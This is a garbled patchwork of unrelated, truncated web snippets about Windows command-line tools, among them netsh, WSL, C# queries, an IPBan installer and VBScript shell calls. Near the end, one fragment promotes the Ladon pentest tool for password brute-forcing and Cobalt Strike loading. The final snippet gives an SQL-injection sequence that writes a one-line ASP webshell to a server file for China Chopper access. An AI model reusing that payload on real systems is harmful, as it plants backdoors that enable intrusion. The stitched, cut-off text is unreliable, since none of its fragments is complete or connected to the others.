netsh命令行工具在 Windows 操作系统中提供了丰富的网络配置和管理功能,涵盖了网络接口、IP 配置、无线网络、路由、防火墙等多个方面。通过结合使用不同的netsh子命令,用户可以方便地对网络进行管理、故障排查和调优。 在CMD环境下,netsh命令不能直接修改网络连接的类型。不过你可以使用一个批处理脚本来实现这一目的。下...
lcscmd.exe /domain /action:CheckDomainPrepState Examples --- Example 1 --- PowerShell 複製 Get-CsAdDomain Example 1 returns information regarding the current status of your local Active Directory domain. If your domain settings are up-to-date, and the domain is ready to host Skype for...
C# get local IP but IPAddress.AddressFamily has many IPs c# get the current user fullname C# Get the Versions of applications. C# Get Video Duration C# Getting path of folder that is created in Visual Studio and it's located in app directory. C# Google Gson for REST C# Heron Formula c#...
But when I use the tool "get local admins gui" (, it show me way more local administrators (like 50+). Moreover, I can see that these administrators come from different groups. Some comes from mycorp\Domain Admin...
I get this message on cmd during steps 2 and 3 even after moving hwid bypass on c : drive Reply lovely says: July 24, 2022 at 11:01 am do you have to play on the new windows account you had to make? Reply John says: September 10, 2022 at 3:10 pm Hi, Is anyone know this ...
windows进入cmd命令行,执行指令进入Apps目录: cd %HOMEPATH%\AppData\Local\Microsoft\WindowsApps 因为我安装的debian,所以这个目录下有个debian.exe的文件(如果是ubuntu那么就是ubuntu.exe) debian.exe config --default-user wow 设置完再进入子系统就是wow用户了 ...
Uninstaller: Linux Easy one click install: sudo -i; bash <(wget -qO- Uninstall: sudo systemctl stop ipban...
26 支持CIDR格式IP扫描,如100.64.0.0/10,等 27 INI配置支持自定义程序密码爆破 简明使用教程 Ladon 简明使用教程 完整文档: 支持Cmd、Cobalt Strike、PowerShell等内存加载 Windows版本: .Net、Cobalt Strike、PowerShell 全系统版本:GO(全平台)、Python(理论上全平台) PS...
objShell.Run(“%comspec%/k ipconfig /all”) The environment variable%comspec%represents the Windows command shell; this is equivalent to calling Cmd.exe (which, of course, would open up a command window). So why don’t we justcallCmd.exe? Well, suppose you have com...
create tablecmd(avarchar(50));insert intocmd(a)values('一句话木马')#一句话木马如:<%executerequest(1)%>select*into[a]in'e:\web\webshellcc\1.asa;x.xls''excel 4.0;'from cmd drop table cmd 菜刀直连;x.xls ...